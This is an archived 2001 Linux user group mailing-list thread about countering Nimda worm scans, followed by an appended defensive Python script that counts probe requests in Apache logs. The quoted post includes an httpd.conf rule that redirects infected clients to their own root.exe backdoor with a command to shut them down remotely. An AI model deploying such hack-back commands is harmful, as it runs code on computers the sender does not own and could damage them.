[NTLUG:Discuss] Possible new nimda counter-attack.

Chris Cox cjcox at acm.org
Wed Oct 10 11:50:41 CDT 2001


I think the LaBrea tarpit thing is a better idea...
I don't recommend redirecting to a site, unless you want to risk
some trouble for yourself.  Of course, if I redirected them somewhere,
I'd want them to see:
http://msbc.simplenet.com/quotes/

But since it's likely that only the computer will go to the address, it
wouldn't have the desired effect.

Richard Geoffrion wrote:

> While researching possible means to counter attack this dang microsoft.nimda
> virus, I discovered that..
> 
> a)  I can't use high ascii characters in linux directory names.
> b)  I can't create a wildcard directory on the reiserfs that would accept
> input from any md command
>     (ie:  mkdir * would then be accessible by cd wombat  or cd nonimda -OR-
> in this case "cd scripts")
> 
> But I DID discover something..... EXTERNAL REDIRECTS!  I tested this and
> redirected the URL
> http://rain.lewisville.tx.us/scripts/..%5c../winnt/system32/cmd.exe straight
> to yahoo.com!  Now of course I don't want to go around sending people to
> other websites......hm....just had a thought!  Maybe I DO want to redirect
> them somewhere!?!?  Maybe I could redirect them to the BIGGEST webpage that
> Microsoft has published....anybody know of a good one?
> 
> But I digress....
> 
> Here is what I added to my httpd.conf file.
> 
> # External Redirect of a nimda scan
> <Location /scripts/*/winnt/system32/*>
>     Deny from all
>     ErrorDocument 403
> http://"$REMOTE_ADDR/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWind
> owsEx+5", "r"
> #    ErrorDocument 403 http://www.yahoo.com
> </Location>
> 
> Since I know that this redirect in and of itself works, my question has to
> do with the syntax of the http string.  Can anyone tell me if this is
> correct or help me with the syntax?  I only want to do my part!
> 
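Added example, not part of the original thread: a passive alternative to redirecting is to count the probes per source address from the Apache access log. This sketch assumes common/combined log format. It percent-decodes the request path repeatedly, so the encoded backslash in the URL quoted above (and a nested encoding of it, which goes beyond what the thread shows) is still recognised. The log lines and addresses are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Client address and request target from an Apache common/combined log line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)')
# Probe shapes named in the thread: cmd.exe via traversal, and root.exe.
PROBE_RE = re.compile(r'(?:^|/)(?:cmd|root)\.exe$', re.IGNORECASE)

def normalize(target, max_rounds=3):
    """Drop the query string, percent-decode until stable, unify slashes."""
    path = target.split('?', 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path, encoding='latin-1')
        if decoded == path:
            break
        path = decoded
    return path.replace('\\', '/')

def is_probe(target):
    """True for cmd.exe/root.exe requests under /scripts or using '..'."""
    path = normalize(target)
    if not PROBE_RE.search(path):
        return False
    return path.lower().startswith('/scripts/') or '/../' in path

def scan(lines):
    """Return a Counter mapping client address to number of probe requests."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_probe(m.group('target')):
            hits[m.group('ip')] += 1
    return hits

# Constructed sample entries (documentation address ranges).
SAMPLE_LOG = '''\
192.0.2.10 - - [10/Oct/2001:11:02:13 -0500] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 287
192.0.2.10 - - [10/Oct/2001:11:02:14 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 275
198.51.100.7 - - [10/Oct/2001:11:03:40 -0500] "GET /index.html HTTP/1.0" 200 1043
198.51.100.7 - - [10/Oct/2001:11:03:41 -0500] "GET /downloads/setup.exe HTTP/1.0" 200 50211
192.0.2.44 - - [10/Oct/2001:11:05:02 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe HTTP/1.0" 404 290
'''

if __name__ == '__main__':
    for ip, n in scan(SAMPLE_LOG.splitlines()).most_common():
        print(f'{ip}\t{n} probe request(s)')
```

The per-address counts can feed a firewall block list or a report to the owner of the infected machine.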




